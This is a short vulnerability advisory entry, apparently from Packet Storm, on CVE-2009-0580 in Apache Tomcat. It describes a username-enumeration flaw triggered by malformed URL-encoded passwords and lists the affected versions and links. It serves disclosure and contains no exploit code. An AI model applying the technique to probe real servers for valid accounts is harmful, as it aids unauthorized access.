Due to insufficient error checking in some authentication classes, Tomcat allows for the enumeration (brute force testing) of usernames by supplying illegally URL encoded passwords. Versions affected include Tomcat 6.0.0 to 6.0.18, Tomcat 5.5.0 to 5.5.27, and Tomcat 4.1.0 to 4.1.39.
You can download this advisory from the following link: https://packetstormsecurity.com/files/download/78090/CVE-2009-0580.txt
Source: https://packetstormsecurity.com/files/78090/Tomcat-Information-Disclosure.html